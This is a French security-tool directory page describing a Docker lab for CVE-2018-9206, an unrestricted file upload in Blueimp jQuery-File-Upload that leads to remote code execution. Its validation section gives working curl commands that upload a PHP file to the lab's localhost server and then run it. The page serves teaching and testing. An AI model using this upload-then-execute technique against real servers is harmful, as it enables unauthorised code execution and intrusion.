Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-9206-jquery-file-upload — Environnement de laboratoire basé sur Docker pour CVE-2018-9206 (Blueimp jQuery-File-Upload téléversement de fichier sans restriction vers RCE) avec scripts PoC et commandes de validation. | Kitploit
Outils/GitHubGitHub/flame-11/cve-2018-9206-jquery-file-upload
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubflame-11/cve-2018-9206-jquery-file-upload

CVE-2018-9206-jquery-file-upload

Environnement de laboratoire basé sur Docker pour CVE-2018-9206 (Blueimp jQuery-File-Upload téléversement de fichier sans restriction vers RCE) avec scripts PoC et commandes de validation.

Voir le dépôt
11il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-9206 - Laboratoire Blueimp jQuery-File-Upload

Environnement Docker vulnérable pour CVE-2018-9206 - Téléversement de fichier sans restriction dans Blueimp jQuery-File-Upload <= 9.22.0.

Démarrage rapide

root@kitploit:~
docker compose up -d --build

Application disponible sur : http://localhost:8888/jQuery-File-Upload/

Validation

root@kitploit:~
# Upload a PHP file
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
  -F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'

# Execute it
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Output: CVE-2018-9206-PWNED

Ou exécutez le script PoC :

root@kitploit:~
./scripts/poc.sh

Nettoyage

root@kitploit:~
docker compose down -v

Détails

ChampValeur
CVECVE-2018-9206
ProduitBlueimp jQuery-File-Upload
Version9.22.0
TypeTéléversement de fichier sans restriction → RCE
CVSS9.8 (Critique)

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2018-9206
  • http://www.vapidlabs.com/advisory.php?v=204
  • https://www.exploit-db.com/exploits/45790/
Télécharger l’outil